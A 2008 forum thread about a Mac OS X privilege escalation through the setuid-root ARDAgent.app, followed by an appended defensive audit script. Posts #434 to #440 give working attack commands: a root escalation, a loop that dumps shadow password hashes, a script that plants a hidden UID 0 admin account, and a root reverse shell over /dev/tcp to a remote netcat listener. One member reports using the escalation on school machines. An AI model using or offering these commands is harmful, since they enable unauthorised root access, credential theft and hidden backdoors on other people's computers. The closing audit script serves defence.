remote login Trojan


683 replies to this topic

#431 andrewistheshit

andrewistheshit
  • Members
  • 2,193 posts

Posted 14 June 2008 - 12:37 AM

Hmm, well, the app names compile for me in Platypus. I just wanted to change the image to something else, and it never shows the image; it just shows it like a preview file.



#432 callmenames

callmenames
  • Members
  • 1,426 posts

Posted 14 June 2008 - 01:30 AM

Do you have write access?

#433 andrewistheshit

andrewistheshit
  • Members
  • 2,193 posts

Posted 14 June 2008 - 02:13 AM

It says I have custom access?

Ugh, wow, my iPod is completely useless till I figure out this PwnageTool thing....
Yes, I know this is a completely different thread, but I just thought I would mention that.

#434 callmenames

callmenames
  • Members
  • 1,426 posts

Posted 14 June 2008 - 02:13 AM

Is anyone else able to get 'ARDAgent.app' to execute a 'do shell script' command from Script Editor? This is very strange.

Try this AppleScript command in Script Editor...
CODE
tell application "ARDAgent.app" to do shell script "id"


Occasionally I have to run it a few times to get it to go, once I had to quit Script Editor and relaunch it before it ran. It's reproducible on a PPC/G4 Tiger/10.4.11 Mac here, and not at all on two others.

I'm extremely curious to know if this works for anyone else and if so, what version of OS X and does your Mac have a PowerPC or Intel processor?

I take that back, I just reproduced it on a PPC/G3 Tiger/10.4.11 as well - at first it did not work, I gave up trying and went to do something else, came back and that machine was asleep - woke it up, clicked run and it worked. Hmm.

Edited by callmenames, 14 June 2008 - 02:28 AM.


#435 andrewistheshit

andrewistheshit
  • Members
  • 2,193 posts

Posted 14 June 2008 - 02:41 AM

I'll try it, but where is the shell script 'id' located, or was it stated in a handler of the AppleScript?
Did I say that right?

#436 callmenames

callmenames
  • Members
  • 1,426 posts

Posted 14 June 2008 - 02:42 AM

Andrew, try...
ls -aloR /Volumes/FDSAFA/Treemovie.app

To see what the permissions are...

Or
chmod -Rf 777 /Volumes/FDSAFA/Treemovie.app
To give read/write/execute permission for all users.

And the AppleScript command is all that's required; just paste it into Script Editor and click Run. If you get an error, keep trying it a dozen or so times. 'Do shell script' runs a command line, not only a script, but the AppleScript command is 'do shell script'.

Sometimes I get this..


And sometimes I get this...
CODE
"uid=0(root) gid=501(G4admin) egid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)"


One time on each of two systems I got uid=0 and euid=501.

Needless to say, if I have ARDAgent.app run the reverse shell command (posted in this thread) instead of having System Events run it, it's a root shell. Without a password.

Edited by callmenames, 14 June 2008 - 02:55 AM.


#437 Wawl

Wawl
  • Members
  • 112 posts

Posted 14 June 2008 - 06:41 AM

CODE
tell application "ARDAgent.app" to do shell script "id"

Works fine for me! (PPC Leopard). That's a great vulnerability!
I also tested it at my school; it allows me to be admin without a password :-)
(My school has Tiger Intel and PPC installed)

But you're right, it doesn't always work, but I just have to wait some seconds.

Edited by Wawl, 14 June 2008 - 06:44 AM.


#438 callmenames

callmenames
  • Members
  • 1,426 posts

Posted 14 June 2008 - 11:01 AM

I am flabbergasted as to why a setuid executable, owned by root, can also execute 'do shell script' commands, but uh... well... happy hacking everybody! :)

Stoopid-easy ARDAgent tricks:
CODE
tell application "ARDAgent" to do shell script "cd /var/db/shadow/hash;for hashfile in $(ls -1 /var/db/shadow/hash);do [ ${hashfile} == ${hashfile/state} ] && echo ${hashfile} && cat ${hashfile} && echo; done; exit 0"


CODE
set hidden_admin_username to "nobodyd"
set hidden_admin_password to "a secret"
set hidden_admin_password_hash to do shell script "openssl passwd -crypt -salt xx '" & hidden_admin_password & "'"

tell application "ARDAgent" to do shell script "/usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' name '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' UniqueID 0; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' PrimaryGroupID 20; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' NFSHomeDirectory /var/root; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' home /var/root; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' UserShell /bin/bash; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' RealName ''; /usr/bin/sudo dscl . -append /Groups/admin GroupMembership '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -append /Groups/wheel GroupMembership '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' naprivs -2147483394; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' authentication_authority 'basic'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' passwd " & hidden_admin_password_hash

Edited by callmenames, 14 June 2008 - 11:08 AM.


#439 callmenames

callmenames
  • Members
  • 1,426 posts

Posted 14 June 2008 - 11:34 AM

Or from Terminal instead of Script Editor...
CODE
osascript -e 'tell application "ARDAgent" to do shell script "cd /var/db/shadow/hash;for hashfile in $(ls -1 /var/db/shadow/hash);do [ ${hashfile} == ${hashfile/state} ] && echo ${hashfile} && cat ${hashfile} && echo; done; exit 0"'


And to avoid having to run it repeatedly until it works...
CODE
while :; do hashes=$( osascript -e 'tell application "ARDAgent" to do shell script "cd /var/db/shadow/hash;for hashfile in $(ls -1 /var/db/shadow/hash);do [ ${hashfile} == ${hashfile/state} ] && echo ${hashfile} && cat ${hashfile} && echo; done; exit 0"' ); [ "${hashes}" != "" ] && echo "${hashes}" && break; done

Edited by callmenames, 14 June 2008 - 11:40 AM.


#440 callmenames

callmenames
  • Members
  • 1,426 posts

Posted 14 June 2008 - 12:23 PM

And for a full root reverse shell...
In Terminal on the receiving computer, run netcat to listen for the incoming connection. (Replace the 127.0.0.1 with the actual IP address of your computer or leave out the '-s 127.0.0.1' entirely. You may have to port-forward in your router and either turn off the OS X firewall or open the port.)
CODE
nc -s 127.0.0.1 -l -p 6880


The command line for the other computer... (change the 127.0.0.1 to the public IP address of the receiving computer.)
CODE
osascript -e 'tell application "ARDAgent" to do shell script "exec 6<>/dev/tcp/127.0.0.1/6880; id >&6; cat <&6 | while read input; do $input >&6 2>&6;echo -n \"${USER}@${HOSTNAME} > \" >&6;done"'

Edited by callmenames, 14 June 2008 - 12:24 PM.
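The posts above come down to two things an administrator of a 10.4/10.5 fleet would want to check for: the ARDAgent binary being setuid root (which is what turns a 'do shell script' AppleEvent into a root shell), and a leftover local account with UniqueID 0 that is not root (the "hidden admin" trick from post #438). The following sh script is an added example, not code from the thread, that audits both. The ARDAgent path is assumed to be the standard location; the two parsing functions take their input as text (constructed sample lines are embedded) so the checks can be exercised on any system, while the live audit uses `ls -l` and `dscl . -list /Users UniqueID` and is macOS-only.

```shell
#!/bin/sh
# Audit helpers for the two conditions discussed in this thread:
#   1. ARDAgent's binary is setuid root (the source of the escalation), and
#   2. a local account other than root has UniqueID 0 (the hidden-admin trick).
# Added example; not code from the thread. The ARDAgent path below is the
# standard 10.4/10.5 location and is an assumption for the live check;
# the parsing functions take their input as text so they run anywhere.

ARDAGENT_BIN="/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent"

# perm_line_is_setuid_root "<one line of ls -l output>"
# Returns 0 when the mode string carries the setuid bit (s or S in the
# owner-execute slot) and the owner field is root, 1 otherwise.
perm_line_is_setuid_root() {
    mode=$(printf '%s\n' "$1" | awk '{print $1}')
    owner=$(printf '%s\n' "$1" | awk '{print $3}')
    case "$mode" in
        ???[sS]??????*) [ "$owner" = "root" ] ;;   # trailing '@'/'+' (xattrs, ACLs) allowed
        *) return 1 ;;
    esac
}

# uid0_accounts "<output of: dscl . -list /Users UniqueID>"
# Prints every account name whose UniqueID is 0, except root itself.
uid0_accounts() {
    printf '%s\n' "$1" | awk 'NF >= 2 && $2 == 0 && $1 != "root" { print $1 }'
}

# Constructed sample in the shape of `dscl . -list /Users UniqueID`;
# "nobodyd" mirrors the hidden admin created earlier in the thread.
SAMPLE_USERS='nobody -2
root 0
daemon 1
nobodyd 0
g4admin 501'

# Live audit (macOS only): reports each finding together with its mitigation.
audit_live() {
    if [ -f "$ARDAGENT_BIN" ]; then
        if perm_line_is_setuid_root "$(ls -l "$ARDAGENT_BIN")"; then
            echo "WARNING: $ARDAGENT_BIN is setuid root"
            echo "         mitigation: sudo chmod u-s $ARDAGENT_BIN"
        else
            echo "OK: ARDAgent is not setuid root"
        fi
    else
        echo "INFO: ARDAgent not found at $ARDAGENT_BIN"
    fi

    extra=$(uid0_accounts "$(dscl . -list /Users UniqueID)")
    if [ -n "$extra" ]; then
        echo "WARNING: accounts with UniqueID 0 besides root:"
        echo "$extra"
        echo "         investigate each one; remove with: sudo dscl . -delete /Users/<name>"
    else
        echo "OK: root is the only UID 0 account"
    fi
}

# Run the live audit only when asked, so the file can also be sourced for its functions.
if [ "${ARD_AUDIT_LIVE:-0}" = "1" ]; then
    audit_live
fi
```

Run it as `ARD_AUDIT_LIVE=1 sh ardaudit.sh` on the Mac being checked. Dropping the setuid bit from ARDAgent removes the root escalation (Remote Desktop management on that machine may need the bit restored by Apple's later update), and any UID 0 account other than root should be treated as a compromise indicator, since nothing in a default install creates one.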




